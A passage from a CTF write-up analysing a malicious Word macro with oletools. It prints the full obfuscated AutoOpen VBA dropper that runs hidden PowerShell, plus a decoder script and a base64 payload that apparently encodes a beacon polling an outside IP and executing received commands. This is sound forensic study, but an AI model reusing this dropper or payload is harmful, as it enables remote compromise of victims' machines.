It was the Diwali holidays, I saw this HackTheBox CTF HackTheBoo where almost all of the challenges were simple, I did 11/25 challenges. The challenges I loved, were from the category of forensics and web. They kinda made pwn challenges cringy (like you would find in any other CTF). and I don’t know much about crypto. so, I didn’t even touch that category. In this article, I am going to solve two forensic challenges. I will explain the topics which you are supposed to know to solve these challenges.
Invitation
This is a challenge in which we are given a docm file `invitation.docm`. we know it is a forensic challenge and the file type is `docm`.
10:47:50 root@kali forensics_invitation → file invitation.docm
invitation.docm: Microsoft Word 2007+it tells all. there has to be some macro embedded in it which we need to extract. I didn’t even open the file to view it. I started my terminal and started analyzing it. the toolkit you will need here is `ole-tools`. Install it with pip package manager.
pip install oletoolswe will run oleid on the given file.
11:31:24 root@kali forensics_invitation → oleid ./invitation.docm
oleid 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
Filename: ./invitation.docm
WARNING For now, VBA stomping cannot be detected for files in memory
--------------------+--------------------+----------+--------------------------
Indicator |Value |Risk |Description
--------------------+--------------------+----------+--------------------------
File format |MS Word 2007+ Macro-|info |
|Enabled Document | |
|(.docm) | |
--------------------+--------------------+----------+--------------------------
Container format |OpenXML |info |Container type
--------------------+--------------------+----------+--------------------------
Encrypted |False |none |The file is not encrypted
--------------------+--------------------+----------+--------------------------
VBA Macros |Yes, suspicious |HIGH |This file contains VBA
| | |macros. Suspicious
| | |keywords were found. Use
| | |olevba and mraptor for
| | |more info.
--------------------+--------------------+----------+--------------------------
XLM Macros |No |none |This file does not contain
| | |Excel 4/XLM macros.
--------------------+--------------------+----------+--------------------------
External |1 |HIGH |External relationships
Relationships | | |found: attachedTemplate -
| | |use oleobj for details
--------------------+--------------------+----------+--------------------------which shows two things in red (in your terminal). External Relationships, which I can check out using `oleobj`.
11:31:36 root@kali forensics_invitation → oleobj ./invitation.docm
oleobj 0.60.1 - http://decalage.info/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues
-------------------------------------------------------------------------------
File: './invitation.docm'
Found relationship 'attachedTemplate' with external link file:///C:\Users\0xp374\Downloads\tf78063791_win32.dotxwhich has no use. I googled what a DOTX file is and it says such a file doesn’t have any macros embedded.
Moving on to the third section where it says “suspicious” and risk is High (VBA Macros). I can use `olevba` for more information.
11:32:27 root@kali forensics_invitation → olevba ./invitation.docm
olevba 0.60.1 on Python 3.10.5 - http://decalage.info/python/oletools
===============================================================================
FILE: ./invitation.docm
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = Environ("TEMP")
bnhupraoau = sryivxjsdncj()
dropPath = Environ("TEMP")
...And it gives a really long output. there is a flag `–reveal` which deobfuscates the macros. we are interested in `VBA MACRO ThisDocument.cls` since it contains some hex chars.
Sub AutoOpen()
odhsjwpphlxnb
Call lmavedb
End Sub
Private Sub odhsjwpphlxnb()
Dim bnhupraoau As String
CreateObject("WScript.Shell").currentdirectory = "%TEMP%"
bnhupraoau = sryivxjsdncj()
dropPath = "%TEMP%"
Set rxnnvnfqufrzqfhnff = CreateObject("b'Scripti'b'ng.FileSystemObject'")
Set dfdjqgaqhvxxi = rxnnvnfqufrzqfhnff.CreateTextFile(dropPath & "b'\\hist'b'ory.bak'", True)
dfdjqgaqhvxxi.Write bnhupraoau
dfdjqgaqhvxxi.Close
End Sub
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Function
Private Function okbzichkqtto() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'74 65 66 122 65 68 48 65 74 1'b'19 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 120 65 68 10'b'7 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 68 65 65 74'b' 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 89 103 66 106 65 71 77 65 78 103 66 107 65 6'b'7 48 65 77 65 65 48 65 68 77 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 65 121 65 68 81 65 77 65 65 5'b'3 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 1'b'10 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 103 65 100 65 66 48 65 72 65 65 79 103 'b'65 118 65 67 56 65 74 119 65 55 65 67 81'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 4'b'8 65 85'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90'b' 65 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'103 65 67 48 65 86 81 66 122 65 71 8'b'5 65 81 103 66 104 65 72 77 65 97 81 66 106 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'70 65 65 89 81 66 121 65 72 77 65 97 81 66'b' 117 65 71 99 65 73 65 65 116 65 70 85 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 'b'65 71 81 65 78 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 122 65 71 73 65'b' 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 69 65 90 65 66 108 65 72 73 65 99 119 65'b' 103 65 69 65 65 101 119 65 105 65 69'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'69 65 100 81 66 48 65 71 103 65 9'b'8 119 66 121 65 71 107 65 101 103 66 104 65 72 81'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 97 81 66 'b'118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 66 111 65 71 107 65 98 65 66 108'b' 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 11'b'7 65 72'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'89 65 98 119 66 114 65 71 85 65 76 81 66 83'b' 65 71 85 65 99 119 66 48 65 69 48 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 7'b'7 65 90 81 66 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 'b'72 73 65 99 119 66 112 65 71'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65'b' 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'74 65 66 122 65 67 'b'56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65'b' 71 85 65 99 103 66 122 65 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 65 81 65 66 55 65 67 73 65 8'b'1 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 66 54 65 71 69 65 'b'100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'112 65 72 48 65 'b'75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'67'b' 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 'b'71 85 65 101'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 65 103 'b'65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 'b'67 65 65 85 119 66 48 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 'b'65 72 73 65 98 119 66 121 65 70 89'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 89 81 66 121 65 71 107 65 89 8'b'1 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 65 107 65 72 73 65 80 81 'b'66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'121 65 7'b'1 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72'b' 73'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 79 119 65 107 65 72 81 65 80 81 66 'b'74 65 71 52 65 100 103 66 118 65 71 115 65 90'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 10'b'8 65 72 81 65 97 65 66 118'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 71 81 65 73'b' 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 'b'65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 'b'81 65 73 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'66 81 'b'65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 85 65 99 103 66 122 65 67 65 65 81 65 66 55'b' 65 67 73 65 81 81 66 49 65 72 81 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98'b' 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 'b'116 65 69 73 65 98 119 66 107'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 72 'b'107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'48 65'b' 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65'b' 86 65 66'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'71 65 68 103 65 76 103 66 72 65 71'b' 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65'b' 103 65 67 48'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 97 103 66 'b'118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'102'b' 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'65 52 65 72 48 65 83 65 66 'b'85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'72 73 65 88 119 65 122 65 68 81 65 78 8'b'1 66 53 65 70 56 65 98 81 65 48 65 71 77 65'")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("b'99 103 65 119 65 68 85 65 102 81 'b'65 61'")
okbzichkqtto = fxnrfzsdxmcvranp
End Function
Private Function sryivxjsdncj() As String
Dim fxnrfzsdxmcvranp As String
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + okbzichkqtto()
sryivxjsdncj = fxnrfzsdxmcvranp
End Function
Sub lmavedb()
dropPath = "%TEMP%"
Set rxnnvnfqufrzqfhnff = CreateObject("b'Scripting.FileSyst'b'emObject'")
Set ktmlmpc = rxnnvnfqufrzqfhnff.OpenTextFile(dropPath & "b'\\h'b'istory.bak'")
secret = ktmlmpc.ReadAll
ktmlmpc.Close
Code = "powershell -WindowStyle hidden -e """ & secret
x = Shell(Code, 1)
End Sub
In the above picture, you can see it says wants to say `history.bak` but instead of that it says `b’\\h’b’istory.bak`. because the flag we used (–reveal) is still in its experimental state. but you get the idea about the sting, what that could be and could be not.
we can see that in function `okbzichkqtto`, some decimal chars separated by space are being to a function called `wdysllqkgsbzs`.
Private Function wdysllqkgsbzs(strBytes) As String
Dim aNumbers
Dim fxnrfzsdxmcvranp As String
Dim iIter
fxnrfzsdxmcvranp = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + Chr(aNumbers(iIter))
Next
wdysllqkgsbzs = fxnrfzsdxmcvranp
End Functionwe can get an idea by looking at it that the function splits the string by space and iterate each decimal character, converting it to its real ASCII char and returning that. so, maybe we can do the same thing in python.
def wdysllqkgsbzs(string):
r = ''
for s in string.split():
r+=chr(int(s))
return r
fxnrfzsdxmcvranp = ""
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("74 65 66 122 65 68 48 65 74 119 65 51 65 68 99 65 76 103 65 51 65 68 81 65 76 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 120 65 68 107 65 79 65 65 117 65 68 85 65 77 103 65 54 65 68 103 65 77 65 65 52")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 68 65 65 74 119 65 55 65 67 81 65 97 81 65 57 65 67 99 65 90 65 65 48 65 68 77")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 89 103 66 106 65 71 77 65 78 103 66 107 65 67 48 65 77 65 65 48 65 68 77 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 65 121 65 68 81 65 77 65 65 53 65 67 48 65 78 119 66 108 65 71 69 65 77 103 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("122 65 71 69 65 77 103 66 106 65 67 99 65 79 119 65 107 65 72 65 65 80 81 65 110 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 103 65 100 65 66 48 65 72 65 65 79 103 65 118 65 67 56 65 74 119 65 55 65 67 81")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 100 103 65 57 65 69 107 65 98 103 66 50 65 71 56 65 97 119 66 108 65 67 48 65 85")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 66 108 65 72 77 65 100 65 66 78 65 71 85 65 100 65 66 111 65 71 56 65 90 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("103 65 67 48 65 86 81 66 122 65 71 85 65 81 103 66 104 65 72 77 65 97 81 66 106 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("70 65 65 89 81 66 121 65 72 77 65 97 81 66 117 65 71 99 65 73 65 65 116 65 70 85 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("99 103 66 112 65 67 65 65 74 65 66 119 65 67 81 65 99 119 65 118 65 71 81 65 78 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 122 65 71 73 65 89 119 66 106 65 68 89 65 90 65 65 103 65 67 48 65 83 65 66 108")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 69 65 90 65 66 108 65 72 73 65 99 119 65 103 65 69 65 65 101 119 65 105 65 69")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("69 65 100 81 66 48 65 71 103 65 98 119 66 121 65 71 107 65 101 103 66 104 65 72 81")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 97 81 66 118 65 71 52 65 73 103 65 57 65 67 81 65 97 81 66 57 65 68 115 65 100")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 66 111 65 71 107 65 98 65 66 108 65 67 65 65 75 65 65 107 65 72 81 65 99 103 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("49 65 71 85 65 75 81 66 55 65 67 81 65 89 119 65 57 65 67 103 65 83 81 66 117 65 72")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("89 65 98 119 66 114 65 71 85 65 76 81 66 83 65 71 85 65 99 119 66 48 65 69 48 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 66 48 65 71 103 65 98 119 66 107 65 67 65 65 76 81 66 86 65 72 77 65 90 81 66 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 69 65 99 119 66 112 65 71 77 65 85 65 66 104 65 72 73 65 99 119 66 112 65 71")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("52 65 90 119 65 103 65 67 48 65 86 81 66 121 65 71 107 65 73 65 65 107 65 72 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("74 65 66 122 65 67 56 65 77 65 65 48 65 68 77 65 90 103 65 121 65 68 81 65 77 65 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("53 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65 71 85 65 99 103 66 122 65 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65 97 65 66 118 65 72 73 65 97")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103 65 105 65 68 48 65 74 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("112 65 72 48 65 75 81 65 55 65 71 107 65 90 103 65 103 65 67 103 65 74 65 66 106 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("67 65 65 76 81 66 117 65 71 85 65 73 65 65 110 65 69 52 65 98 119 66 117 65 71 85")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 74 119 65 112 65 67 65 65 101 119 65 107 65 72 73 65 80 81 66 112 65 71 85 65 101")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 65 103 65 67 81 65 89 119 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("121 65 69 69 65 89 119 66 48 65 71 107 65 98 119 66 117 65 67 65 65 85 119 66 48 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 56 65 99 65 65 103 65 67 48 65 82 81 66 121 65 72 73 65 98 119 66 121 65 70 89")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 89 81 66 121 65 71 107 65 89 81 66 105 65 71 119 65 90 81 65 103 65 71 85 65 79")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 65 107 65 72 73 65 80 81 66 80 65 72 85 65 100 65 65 116 65 70 77 65 100 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("121 65 71 107 65 98 103 66 110 65 67 65 65 76 81 66 74 65 71 52 65 99 65 66 49 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 81 65 84 119 66 105 65 71 111 65 90 81 66 106 65 72 81 65 73 65 65 107 65 72 73")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 79 119 65 107 65 72 81 65 80 81 66 74 65 71 52 65 100 103 66 118 65 71 115 65 90")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 65 116 65 70 73 65 90 81 66 122 65 72 81 65 84 81 66 108 65 72 81 65 97 65 66 118")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 71 81 65 73 65 65 116 65 70 85 65 99 103 66 112 65 67 65 65 74 65 66 119 65 67")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("81 65 99 119 65 118 65 68 99 65 90 81 66 104 65 68 73 65 77 119 66 104 65 68 73 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("89 119 65 103 65 67 48 65 84 81 66 108 65 72 81 65 97 65 66 118 65 71 81 65 73 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("66 81 65 69 56 65 85 119 66 85 65 67 65 65 76 81 66 73 65 71 85 65 89 81 66 107 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 85 65 99 103 66 122 65 67 65 65 81 65 66 55 65 67 73 65 81 81 66 49 65 72 81 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("97 65 66 118 65 72 73 65 97 81 66 54 65 71 69 65 100 65 66 112 65 71 56 65 98 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 105 65 68 48 65 74 65 66 112 65 72 48 65 73 65 65 116 65 69 73 65 98 119 66 107")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 72 107 65 73 65 65 111 65 70 115 65 85 119 66 53 65 72 77 65 100 65 66 108 65 71")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("48 65 76 103 66 85 65 71 85 65 101 65 66 48 65 67 52 65 82 81 66 117 65 71 77 65 98")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("119 66 107 65 71 107 65 98 103 66 110 65 70 48 65 79 103 65 54 65 70 85 65 86 65 66")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("71 65 68 103 65 76 103 66 72 65 71 85 65 100 65 66 67 65 72 107 65 100 65 66 108 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 77 65 75 65 65 107 65 71 85 65 75 119 65 107 65 72 73 65 75 81 65 103 65 67 48")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 97 103 66 118 65 71 107 65 98 103 65 103 65 67 99 65 73 65 65 110 65 67 107 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("102 81 65 103 65 72 77 65 98 65 66 108 65 71 85 65 99 65 65 103 65 68 65 65 76 103")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("65 52 65 72 48 65 83 65 66 85 65 69 73 65 101 119 65 49 65 72 85 65 99 65 65 122 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("72 73 65 88 119 65 122 65 68 81 65 78 81 66 53 65 70 56 65 98 81 65 48 65 71 77 65")
fxnrfzsdxmcvranp = fxnrfzsdxmcvranp + wdysllqkgsbzs("99 103 65 119 65 68 85 65 102 81 65 61")
print(fxnrfzsdxmcvranp)
This outputs a base64 encoded string.
JABzAD0AJwA3ADcALgA3ADQALgAxADkAOAAuADUAMgA6ADgAMAA4ADAAJwA7ACQAaQA9ACcAZAA0ADMAYgBjAGMANgBkAC0AMAA0ADMAZgAyADQAMAA5AC0ANwBlAGEAMgAzAGEAMgBjACcAOwAkAHAAPQAnAGgAdAB0AHAAOgAvAC8AJwA7ACQAdgA9AEkAbgB2AG8AawBlAC0AUgBlAHMAdABNAGUAdABoAG8AZAAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAAtAFUAcgBpACAAJABwACQAcwAvAGQANAAzAGIAYwBjADYAZAAgAC0ASABlAGEAZABlAHIAcwAgAEAAewAiAEEAdQB0AGgAbwByAGkAegBhAHQAaQBvAG4AIgA9ACQAaQB9ADsAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQB7ACQAYwA9ACgASQBuAHYAbwBrAGUALQBSAGUAcwB0AE0AZQB0AGgAbwBkACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAgAC0AVQByAGkAIAAkAHAAJABzAC8AMAA0ADMAZgAyADQAMAA5ACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AKQA7AGkAZgAgACgAJABjACAALQBuAGUAIAAnAE4AbwBuAGUAJwApACAAewAkAHIAPQBpAGUAeAAgACQAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAC0ARQByAHIAbwByAFYAYQByAGkAYQBiAGwAZQAgAGUAOwAkAHIAPQBPAHUAdAAtAFMAdAByAGkAbgBnACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAHIAOwAkAHQAPQBJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAJABwACQAcwAvADcAZQBhADIAMwBhADIAYwAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAQAB7ACIAQQB1AHQAaABvAHIAaQB6AGEAdABpAG8AbgAiAD0AJABpAH0AIAAtAEIAbwBkAHkAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGU